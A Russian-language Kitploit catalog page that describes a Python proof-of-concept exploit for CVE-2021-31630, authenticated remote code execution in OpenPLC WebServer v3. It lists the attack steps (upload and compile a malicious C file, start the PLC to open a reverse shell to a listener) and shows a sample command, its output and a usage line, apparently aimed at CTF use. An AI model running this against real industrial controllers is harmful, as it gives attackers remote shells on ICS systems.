Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-31630 — POC-эксплойт для CVE-2021-31630, написанный на Python3 и использующий C reverse shell в неблокирующем режиме. | Kitploit
Инструменты/GitHubGitHub/flojboj/cve-2021-31630
ЭксплуатацияБезопасность SCADA/ICSЭксплуатация веб-приложенийCTFОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubflojboj/cve-2021-31630

CVE-2021-31630

POC-эксплойт для CVE-2021-31630, написанный на Python3 и использующий C reverse shell в неблокирующем режиме.

Репозиторий
42 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

OpenPLC WebServer v3 - Аутентифицированное удаленное выполнение кода (CVE-2021-31630)


Этот эксплойт основан на эксплойте с Exploit-DB от Fellipe Oliveira.

  • Сначала аутентифицируйтесь
  • Загрузите вредоносный C-файл
  • Скомпилируйте его
  • Запустите ПЛК (инициируйте reverse shell)
  • Остановите ПЛК (нет необходимости запускать его, reverse shell уже инициирован)
root@kitploit:~
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.

Как использовать

root@kitploit:~
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>

Опции:

  • --url - URL OpenPLC
  • --username - имя пользователя
  • --password - пароль
  • --listenerip - IP-адрес слушателя
  • --listenerport - порт слушателя
  • ПРИМЕЧАНИЕ: Этот эксплойт создан как PoC; используйте его только в образовательных целях или для CTF - https://flojboj.org/article/WifineticTwo

    Скачать инструмент